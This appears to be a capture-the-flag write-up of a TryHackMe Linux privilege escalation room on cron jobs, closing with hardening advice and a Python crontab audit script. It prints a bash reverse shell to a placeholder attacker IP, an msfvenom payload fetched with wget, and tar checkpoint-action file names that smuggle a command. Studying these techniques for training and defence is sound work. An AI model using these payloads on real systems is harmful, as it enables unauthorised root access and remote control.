In this video walk-through, we covered Linux privilege escalation through the crontab. The crontab holds every cron job, that is, every program scheduled to run at a specific time.

Overview

  • Focuses on escalating privileges in Linux systems through cron jobs by:
    • Modifying writable scripts.
    • Exploiting wildcards in commands.
    • Manipulating environment variables.

Linux Cron Jobs

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

1. Inspecting Cron Jobs

  • Command:
    cat /etc/crontab
  • Purpose: lists all scheduled cron jobs and the scripts they run.
  • Example output: two scripts identified, overwrite.sh and compressed.sh.

2. Privilege Escalation via Writable Cron Job Script

  • Steps:
    1. Locate the script:
       locate overwrite.sh
    2. Check the script's permissions:
       ls -la /path/to/overwrite.sh
    3. If it is writable, overwrite the script with a payload, such as a reverse shell.

  • Payload example: reverse shell in overwrite.sh
    bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1

  • Open a listener on your machine:
    nc -lvnp <your_port>

  • Wait for the cron job to execute the modified script and receive a root shell.

3. Exploiting Wildcards in Commands

  • Target: compressed.sh, which runs a tar command with a wildcard.
  • Steps:
    1. Create a reverse shell payload:
       msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f elf -o shell.elf
    2. Transfer the payload to the target machine (serve it from your machine, then fetch it on the target):
       python3 -m http.server
       wget http://<your_ip>:<your_port>/shell.elf
    3. Create tar-compatible checkpoint files to exploit the wildcard:
       touch -- "--checkpoint=1"
       touch -- "--checkpoint-action=exec=sh shell.elf"
    4. The cron job runs tar; the shell expands the wildcard to these file names, tar parses them as options, and the payload is executed.

4. Manipulating Environment Variables

  • Context:
    • Cron jobs often rely on the PATH variable to locate scripts or binaries.
    • If PATH includes user-writable directories that are searched before the script's real location, a malicious script of the same name is executed instead of the legitimate one.
  • Steps:
    1. Inspect the PATH variable:
       cat /etc/crontab
    2. Create a malicious script, named after the script the cron job invokes, in a writable directory listed in PATH (e.g., /tmp or ~/):
       nano /tmp/overwrite
       Add a reverse shell or any malicious command.
    3. Ensure execution permissions:
       chmod +x /tmp/overwrite
    4. The cron job executes your script because the writable directory in PATH is searched first.

Linux Privilege Escalation Checklist

  1. Writable Files and Directories:
    • Always check permissions (ls -la) to identify writable scripts or directories.
    • Modify scripts or binaries when permissions allow.
  2. Wildcards in Commands:
    • Exploit wildcards (*) in cron jobs using tools like tar to execute arbitrary commands.
  3. Environment Variables:
    • Check the PATH value in /etc/crontab.
    • Place malicious scripts in writable directories included in the PATH variable.
  4. Safe Practices:
    • Keep system tools like tar updated, and do not pass a bare wildcard to tar in cron jobs (give it explicit paths or a directory argument instead).
    • Avoid including writable directories in the PATH, and make sure cron job scripts are owned by root and not writable by other users.
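As an added example (not part of the write-up or the room), a small audit script that checks a system crontab for the three weaknesses in this checklist: writable job scripts, tar run with a bare wildcard, and writable directories in PATH that are searched before a job's real location. The crontab, the script bodies and the set of writable paths are constructed sample data, and the script names follow the write-up.

```python
import re
from typing import Callable, Dict, List, Optional
# Constructed sample system crontab laid out like the one in the room; the script
# names come from the write-up, the paths and the PATH value are assumptions.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compressed.sh
0 2 * * * root /usr/bin/apt-get update
"""
# Constructed script bodies, and an assumed set of paths a low-privileged user can write.
SAMPLE_FILES: Dict[str, str] = {
    "/usr/local/bin/overwrite.sh": "#!/bin/bash\necho $(date) > /tmp/useless\n",
    "/usr/local/bin/compressed.sh": "#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tgz *\n",
}
SAMPLE_WRITABLE = {"/home/user", "/usr/local/bin/overwrite.sh"}
TAR_WILDCARD = re.compile(r"\btar\b.*\s\*")  # a tar invocation given a bare * argument

def audit_crontab(text: str, is_writable: Callable[[str], bool],
                  read_file: Callable[[str], Optional[str]]) -> List[str]:
    """Flag writable job scripts, tar wildcards and writable PATH directories."""
    findings: List[str] = []
    path_dirs: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path_dirs = line[5:].split(":")
            findings += [f"PATH dir {d} is writable" for d in path_dirs if is_writable(d)]
            continue
        parts = line.split(None, 6)  # min hour dom mon dow user command
        if len(parts) < 7:
            continue  # another VAR=value line, or malformed
        user, prog = parts[5], parts[6].split()[0]
        if "/" in prog:
            script = prog
        else:  # bare name: cron resolves it through PATH, first directory with a match wins
            found = next((d for d in path_dirs if read_file(f"{d}/{prog}") is not None), None)
            ahead = path_dirs if found is None else path_dirs[:path_dirs.index(found)]
            findings += [f"{user} job '{prog}': writable {d} is searched before its real location"
                         for d in ahead if is_writable(d)]
            script = f"{found}/{prog}" if found else prog
        if is_writable(script):
            findings.append(f"{user} job script {script} is writable")
        if TAR_WILDCARD.search(read_file(script) or ""):
            findings.append(f"{script} runs tar with a wildcard argument")
    return findings
```

On a live host, pass `lambda p: os.access(p, os.W_OK)` as `is_writable` and a reader that returns a file's text (or None when it does not exist) as `read_file`, with the contents of /etc/crontab as `text`.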

Conclusion

  • Techniques covered:
    • Modifying writable scripts.
    • Exploiting wildcards in cron jobs.
    • Using environment variables for privilege escalation.
  • Outcome:
    • Demonstrated how to escalate privileges to root using cron job vulnerabilities.

TryHackMe Linux Privesc | Room Answers

What is the value of the PATH variable in /etc/crontab?

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.